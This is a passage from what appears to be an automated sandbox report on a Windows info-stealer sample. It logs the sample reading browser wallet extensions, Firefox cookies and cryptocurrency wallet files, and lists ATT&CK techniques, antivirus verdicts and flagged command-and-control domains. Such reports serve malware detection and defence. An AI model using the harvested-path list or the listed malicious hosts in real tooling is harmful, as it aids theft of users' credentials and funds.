                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000000.00000003.1540480401.0000000001068000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1540788781.0000000001068000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wf1Ps82LYF.exe PID: 7588, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: wf1Ps82LYF.exe PID: 7588, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                Process Injection
                34
                Virtualization/Sandbox Evasion
                1
                OS Credential Dumping
                751
                Security Software Discovery
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                1
                Process Injection
                LSASS Memory34
                Virtualization/Sandbox Evasion
                Remote Desktop Protocol31
                Data from Local System
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information
                Security Account Manager2
                Process Discovery
                SMB/Windows Admin SharesData from Network Shared Drive113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information
                NTDS2
                File and Directory Discovery
                Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing
                LSA Secrets223
                System Information Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                wf1Ps82LYF.exe45%ReversingLabsWin32.Trojan.Symmi
                wf1Ps82LYF.exe100%AviraTR/Crypt.XPACK.Gen
                wf1Ps82LYF.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://tacitglibbr.biz/jLI100%Avira URL Cloudmalware
                https://tacitglibbr.biz:443/apiDQ100%Avira URL Cloudmalware
                https://tacitglibbr.biz/sZ7100%Avira URL Cloudmalware
                https://tacitglibbr.biz:443/apil100%Avira URL Cloudmalware
                https://tacitglibbr.biz/apizT100%Avira URL Cloudmalware
                https://tacitglibbr.biz:443/apin.txtPK100%Avira URL Cloudmalware
                https://tacitglibbr.biz/d100%Avira URL Cloudmalware
                https://tacitglibbr.biz/M100%Avira URL Cloudmalware
                https://tacitglibbr.biz/pil100%Avira URL Cloudmalware
                https://tacitglibbr.biz/apill100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                tacitglibbr.biz
                104.21.50.161
                truefalse
                  high
                  fp2e7a.wpc.phicdn.net
                  192.229.221.95
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    sordid-snaked.cyoufalse
                      high
                      awake-weaves.cyoufalse
                        high
                        immureprech.bizfalse
                          high
                          https://tacitglibbr.biz/apifalse
                            high
                            deafeninggeh.bizfalse
                              high
                              tacitglibbr.bizfalse
                                high
                                debonairnukk.xyzfalse
                                  high
                                  diffuculttan.xyzfalse
                                    high
                                    effecterectz.xyzfalse
                                      high
                                      wrathful-jammy.cyoufalse
                                        high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabwf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://tacitglibbr.biz/jLIwf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001052000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://tacitglibbr.biz/wf1Ps82LYF.exe, 00000000.00000002.1620621391.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1540730534.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1512232664.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001052000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1536299453.0000000005A73000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1578306795.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000002.1618128391.00000000010E3000.00000004.00000020.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1565482886.00000000010E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/ac/?q=wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icowf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://tacitglibbr.biz/Mwf1Ps82LYF.exe, 00000000.00000003.1536686995.0000000005A73000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1536997543.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1540730534.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1536299453.0000000005A73000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://tacitglibbr.biz/piwf1Ps82LYF.exe, 00000000.00000003.1578681212.00000000010E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://ocsp.rootca1.amazontrust.com0:wf1Ps82LYF.exe, 00000000.00000003.1512838400.0000000005AED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://tacitglibbr.biz/pilwf1Ps82LYF.exe, 00000000.00000003.1461546724.0000000001068000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://www.ecosia.org/newtab/wf1Ps82LYF.exe, 00000000.00000003.1462644701.0000000005A1D000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1462698086.0000000005A1A000.00000004.00000800.00020000.00000000.sdmp, wf1Ps82LYF.exe, 00000000.00000003.1463114308.0000000005A1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brwf1Ps82LYF.exe, 00000000.00000003.1513934245.0000000005D0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://tacitglibbr.biz/sZ7wf1Ps82LYF.exe, 00000000.00000003.1565482886.00000000010E3000.00000004.00000020.00020000.00000000.sdmpfalse
